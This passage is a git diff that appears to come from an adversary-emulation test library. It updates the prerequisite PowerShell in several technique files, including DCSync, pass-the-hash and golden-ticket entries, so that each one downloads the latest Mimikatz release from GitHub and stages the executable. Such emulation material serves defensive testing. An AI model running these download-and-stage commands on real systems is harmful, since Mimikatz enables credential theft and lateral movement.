+Invoke-WebRequest "https://github.com$mimikatz_relative_uri" -UseBasicParsing -OutFile "$env:TEMP\Mimi.zip"
 Expand-Archive $env:TEMP\Mimi.zip $env:TEMP\Mimi -Force
 New-Item -ItemType Directory (Split-Path #{mimikatz_exe}) -Force | Out-Null
 Copy-Item $env:TEMP\Mimi\x64\mimikatz.exe #{mimikatz_exe} -Force
diff --git a/atomics/T1003.006/T1003.006.md b/atomics/T1003.006/T1003.006.md
index 8a949602..804393a0 100644
--- a/atomics/T1003.006/T1003.006.md
+++ b/atomics/T1003.006/T1003.006.md
@@ -56,7 +56,8 @@ if (Test-Path $mimikatz_path) {exit 0} else {exit 1}
 ##### Get Prereq Commands:
 ```powershell
 $mimikatz_path = cmd /c echo #{mimikatz_path}
-Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200918-fix/mimikatz_trunk.zip" -OutFile "$env:TEMP\mimikatz.zip"
+$mimikatz_relative_uri = Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/latest" -UseBasicParsing | Select-Object -ExpandProperty Links | Where-Object -Property href -Like "*/mimikatz_trunk.zip" | Select-Object -ExpandProperty href
+Invoke-WebRequest "https://github.com$mimikatz_relative_uri" -UseBasicParsing -OutFile "$env:TEMP\mimikatz.zip"
 Expand-Archive $env:TEMP\mimikatz.zip $env:TEMP\mimikatz -Force
 New-Item -ItemType Directory (Split-Path $mimikatz_path) -Force | Out-Null
 Move-Item $env:TEMP\mimikatz\x64\mimikatz.exe $mimikatz_path -Force
diff --git a/atomics/T1055/T1055.md b/atomics/T1055/T1055.md
index 89bdde81..fd7e0d82 100644
--- a/atomics/T1055/T1055.md
+++ b/atomics/T1055/T1055.md
@@ -111,8 +111,8 @@ if (Test-Path $mimikatz_path) {exit 0} else {exit 1}
 ```powershell
 $mimikatz_path = cmd /c echo #{mimikatz_path}
 [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
-$mimikatz_relative_uri = Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/latest" | Select-Object -ExpandProperty Links | Where-Object -Property href -Like "*/mimikatz_trunk.zip" | Select-Object -ExpandProperty href
-Invoke-WebRequest "https://github.com$mimikatz_relative_uri" -OutFile "$env:TEMP\mimikatz.zip"
+$mimikatz_relative_uri = Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/latest" -UseBasicParsing | Select-Object -ExpandProperty Links | Where-Object -Property href -Like "*/mimikatz_trunk.zip" | Select-Object -ExpandProperty href
+Invoke-WebRequest "https://github.com$mimikatz_relative_uri" -UseBasicParsing -OutFile "$env:TEMP\mimikatz.zip"
 Expand-Archive $env:TEMP\mimikatz.zip $env:TEMP\mimikatz -Force
 New-Item -ItemType Directory (Split-Path $mimikatz_path) -Force | Out-Null
 Move-Item $env:TEMP\mimikatz\x64\mimikatz.exe $mimikatz_path -Force
diff --git a/atomics/T1207/T1207.md b/atomics/T1207/T1207.md
index c5ccbfba..74ce9a7e 100644
--- a/atomics/T1207/T1207.md
+++ b/atomics/T1207/T1207.md
@@ -88,7 +88,8 @@ if (Test-Path $mimikatz_path) {exit 0} else {exit 1}
 ##### Get Prereq Commands:
 ```powershell
 $mimikatz_path = cmd /c echo #{mimikatz_path}
-Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200918-fix/mimikatz_trunk.zip" -OutFile "$env:TEMP\mimikatz.zip"
+$mimikatz_relative_uri = Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/latest" -UseBasicParsing | Select-Object -ExpandProperty Links | Where-Object -Property href -Like "*/mimikatz_trunk.zip" | Select-Object -ExpandProperty href
+Invoke-WebRequest "https://github.com$mimikatz_relative_uri" -UseBasicParsing -OutFile "$env:TEMP\mimikatz.zip"
 Expand-Archive $env:TEMP\mimikatz.zip $env:TEMP\mimikatz -Force
 New-Item -ItemType Directory (Split-Path $mimikatz_path) -Force | Out-Null
 Move-Item $env:TEMP\mimikatz\x64\mimikatz.exe $mimikatz_path -Force
diff --git a/atomics/T1550.002/T1550.002.md b/atomics/T1550.002/T1550.002.md
index 14e71e5b..42f67bac 100644
--- a/atomics/T1550.002/T1550.002.md
+++ b/atomics/T1550.002/T1550.002.md
@@ -57,7 +57,8 @@ if (Test-Path $mimikatz_path) {exit 0} else {exit 1}
 ##### Get Prereq Commands:
 ```powershell
 $mimikatz_path = cmd /c echo #{mimikatz_path}
-Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20210724/mimikatz_trunk.zip" -OutFile "$env:TEMP\mimikatz.zip"
+$mimikatz_relative_uri = Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/latest" -UseBasicParsing | Select-Object -ExpandProperty Links | Where-Object -Property href -Like "*/mimikatz_trunk.zip" | Select-Object -ExpandProperty href
+Invoke-WebRequest "https://github.com$mimikatz_relative_uri" -UseBasicParsing -OutFile "$env:TEMP\mimikatz.zip"
 Expand-Archive $env:TEMP\mimikatz.zip $env:TEMP\mimikatz -Force
 New-Item -ItemType Directory (Split-Path $mimikatz_path) -Force | Out-Null
 Move-Item $env:TEMP\mimikatz\x64\mimikatz.exe $mimikatz_path -Force
diff --git a/atomics/T1550.003/T1550.003.md b/atomics/T1550.003/T1550.003.md
index b7dff150..34a582ab 100644
--- a/atomics/T1550.003/T1550.003.md
+++ b/atomics/T1550.003/T1550.003.md
@@ -56,7 +56,8 @@ if (Test-Path #{mimikatz_exe}) {exit 0} else {exit 1}
 ##### Get Prereq Commands:
 ```powershell
 [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
-Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200918-fix/mimikatz_trunk.zip" -OutFile "$env:TEMP\Mimi.zip"
+$mimikatz_relative_uri = Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/latest" -UseBasicParsing | Select-Object -ExpandProperty Links | Where-Object -Property href -Like "*/mimikatz_trunk.zip" | Select-Object -ExpandProperty href
+Invoke-WebRequest "https://github.com$mimikatz_relative_uri" -UseBasicParsing -OutFile "$env:TEMP\Mimi.zip"
 Expand-Archive $env:TEMP\Mimi.zip $env:TEMP\Mimi -Force
 New-Item -ItemType Directory (Split-Path #{mimikatz_exe}) -Force | Out-Null
 Copy-Item $env:TEMP\Mimi\x64\mimikatz.exe #{mimikatz_exe} -Force
diff --git a/atomics/T1558.001/T1558.001.md b/atomics/T1558.001/T1558.001.md
index e6e1d49f..e4bc6e21 100644
--- a/atomics/T1558.001/T1558.001.md
+++ b/atomics/T1558.001/T1558.001.md
@@ -107,7 +107,8 @@ if (Test-Path $mimikatz_path) {exit 0} else {exit 1}
 ##### Get Prereq Commands:
 ```powershell
 $mimikatz_path = cmd /c echo #{mimikatz_path}
-Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200918-fix/mimikatz_trunk.zip" -OutFile "$env:TEMP\mimikatz.zip"
+$mimikatz_relative_uri = Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/latest" -UseBasicParsing | Select-Object -ExpandProperty Links | Where-Object -Property href -Like "*/mimikatz_trunk.zip" | Select-Object -ExpandProperty href
+Invoke-WebRequest "https://github.com$mimikatz_relative_uri" -UseBasicParsing -OutFile "$env:TEMP\mimikatz.zip"
 Expand-Archive $env:TEMP\mimikatz.zip $env:TEMP\mimikatz -Force
 New-Item -ItemType Directory (Split-Path $mimikatz_path) -Force | Out-Null
 Move-Item $env:TEMP\mimikatz\x64\mimikatz.exe $mimikatz_path -Force